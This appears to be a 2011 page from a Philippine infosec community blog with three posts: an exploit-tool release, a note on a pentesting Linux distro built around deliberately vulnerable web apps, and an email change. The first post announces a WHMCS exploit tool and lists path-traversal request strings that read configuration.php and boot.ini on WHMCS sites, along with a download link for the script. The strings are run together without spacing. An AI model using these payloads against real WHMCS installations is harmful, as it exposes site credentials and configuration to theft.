Tuesday, November 29, 2011
ProjectX WHMCS Exploit Tool
But with the help of another friend whose name is lufi, we were able to materialize the same tool but this time it is coded in PHP and is user friendly. It is still aimed at exploiting WHMCS but we allow users to choose their own payload.
cart.php?a=projectx&templatefile=../../../configuration.php"clients/cart.php?a=projectx&templatefile=../../../configuration.php"submitticket.php?step=projectx&templatefile=../../../../../../../../../boot.iniclientarea.php?action=projectx&templatefile=../../configuration.phpreports.php?report=../../../../../../../boot.ini
You can download the full script here.
About the Contributor:
Shipcode
is a prolific blogger of ROOTCON and at the same time an InfoSec
enthusiast from Cebu. He was inspired to join ROOTCON as part of the
core team to share his knowledge in information security. He encourages
other like minded individuals to come forward and share their knowledge
through blogging right here at ROOTCON Blog section.
ROOTCON is managed by like minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.
Wednesday, November 16, 2011
Filipino Penetration Testing Linux Distro on the Making
Posted by
Shipcode
at
16.11.11
Labels:
Debian,
Hacking Tool,
Linux,
open source,
pentesting,
Pipi,
Project Playground,
Web Vulnerability Assessment
BackTrack, Blackbuntu,
Backbox, Nodezro PHLAK, Knoppix-STD, Helix, etc.; these Linux distros are the
common penetration testing distributions known today. But did you know that
another Filipino is on the move on making a pentesting distro? Aside from
semprix (the founder of ROOTCON) who is planning to make a BSD pentesting
distro, we also have creatures who is currently developing a new Linux Distro
which is the Project Playground.
Project
Playground or “Pipi” is a pentesting distro based on Debian. It centers on web
application security practice, it is packed with web apps intended to have
vulnerabilities and weaknesses for you to practice. This includes DVWA,
mutillidae, gruyere and webgoat and many more. Aside from those mentioned,
articles and tutorials are also included.
For
now the alpha release is available for download and I have already tried it.
Kudos to creatures for the Alpha Release and for adding Nikto after my
suggestion about the inclusion of the said tool and because it is still under
development, you can email creatures at ysda27[at]gmail[dot]com or visit his website for more updates about his
project. I hope he will add Metasploit on his distro! Creatures is currently
planning on creating a GUI (Graphical User Interface) for the tools and web apps
and you can stalk some of his tutorials on the ProjectX Blog.
About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security. He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.
ROOTCON is managed by like minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.
Monday, November 07, 2011
ROOTCON Email Updates
We have decommissioned info [at] rootcon d0t org, for all general inquiries send them to the new email address at comms /you-know-what/ rootcon dot org.
Details can be found at
http://www.rootcon.org/xml/contacts - Contact Details
http://www.rootcon.org/xml/faq/ - FAQ
Read More
Details can be found at
http://www.rootcon.org/xml/contacts - Contact Details
http://www.rootcon.org/xml/faq/ - FAQ
Subscribe to:
Posts (Atom)
Subscribe to:
Posts (Atom)